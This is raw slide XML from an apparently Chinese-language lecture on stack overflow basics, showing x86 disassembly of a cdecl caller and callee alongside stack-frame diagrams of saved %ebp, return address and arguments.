          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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23" name="Shape 323"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333" kern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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1e:   e8 fc ff ff ff  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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24" name="Shape 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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25" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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26" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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27" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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28" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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29" name="Shape 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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330" name="Shape 330"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="331" name="Shape 331"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="332" name="Shape 332"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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333" name="Shape 333"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444788" y="5485680"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="334" name="Shape 334"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="335" name="Shape 335"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Shape 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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3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37" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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2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38" name="Shape 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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1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39" name="Shape 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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return address (callee)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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="4696937"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Shape 341"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="342" name="Shape 342"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A36658-4A28-410E-B8D1-1F764590CD48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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476BCF5A-39EA-46F4-B873-3F2596DE6221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 348"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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49" name="Shape 349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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50" name="Shape 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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51" name="Shape 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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52" name="Shape 352"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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53" name="Shape 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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54" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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55" name="Shape 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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356" name="Shape 356"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798409" y="5910533"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="357" name="Shape 357"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1633503"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="358" name="Shape 358"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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3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60" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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2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61" name="Shape 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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1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62" name="Shape 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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return address (callee)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63" name="Shape 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="5103337"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="365" name="Shape 365"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="366" name="Shape 366"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC312AD-6758-4063-BECA-B0DEA437CFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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D55193B5-259B-4339-A62B-A6F37CA3BC55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 372"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
